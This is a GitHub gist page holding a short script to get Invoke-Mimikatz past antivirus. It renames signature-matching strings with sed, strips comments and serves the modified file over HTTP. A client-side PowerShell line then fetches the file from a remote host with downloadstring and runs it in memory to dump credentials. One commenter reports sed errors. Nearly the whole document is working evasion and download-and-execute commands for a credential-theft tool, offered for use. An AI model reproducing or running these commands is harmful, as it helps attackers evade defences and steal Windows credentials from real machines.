Skip to content

Instantly share code, notes, and snippets.

@PaulSec
Created August 1, 2017 13:50
Show Gist options
  • Save PaulSec/0f5faff83246b37fe9d3d5a2f5fc9fe0 to your computer and use it in GitHub Desktop.
Save PaulSec/0f5faff83246b37fe9d3d5a2f5fc9fe0 to your computer and use it in GitHub Desktop.
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
python -m SimpleHTTPServer 3615
# Client-side:
Invoke-Expression (New-Object Net.Webclient).downloadstring('http://x.x.x.x:3615/Invoke-Mimikatz.ps1')
Invoke-Mimidogz
@eaneatfruit
Copy link

Hi, does this still work?

Various times I get errors with this line:
sed -i -e '/<#/,/#>/c\' Invoke-Mimikatz.ps1
and:
sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions #-/g" Invoke-Mimikatz.ps1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment